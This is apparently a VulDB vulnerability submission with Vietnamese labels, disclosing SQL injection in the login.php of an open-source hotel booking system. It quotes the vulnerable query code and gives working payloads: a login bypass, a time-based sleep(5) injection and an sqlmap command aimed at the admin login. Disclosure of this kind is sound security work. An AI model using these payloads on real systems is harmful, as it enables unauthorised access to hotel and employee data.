| tiêu đề | SQL injection in Online-Booking-And-Hotel-Management-System |
|---|
| Mô tả | in file "login.php" line 50:
```
$Email=$_POST['email'];
$pass=$_POST['pass'];
$query="SELECT * FROM `employees` WHERE email='$Email'AND mep_password='$pass'";
$runQuery=mysqli_query($conn,$query);
$rowQuery= mysqli_num_rows($runQuery);
```
close with <'#>, so send a post request like "[email protected]&pass=admin'#" can successfully login.
try WAITFOR DELAY Injection:
POST "[email protected]&pass=admin' and sleep(5)#" . The page successfully delayed the response by 5 seconds.
try more attacks by <python sqlmap.py -u "xxx/Online-Booking-And-Hotel-Management-System/admin/login.php" --data="[email protected]&pass=admin"> |
|---|
| Nguồn | ⚠️ https://github.com/Rifatur/Online-Booking-And-Hotel-Management-System |
|---|
| Người dùng | binghuang (UID 30681) |
|---|
| Đệ trình | 05/08/2022 10:25 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 05/08/2022 12:38 (2 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 205657 [Rigatur Online Booking and Hotel Management System aff6409 POST Request login.php email/pass Tiêm SQL] |
|---|
| điểm | 20 |
|---|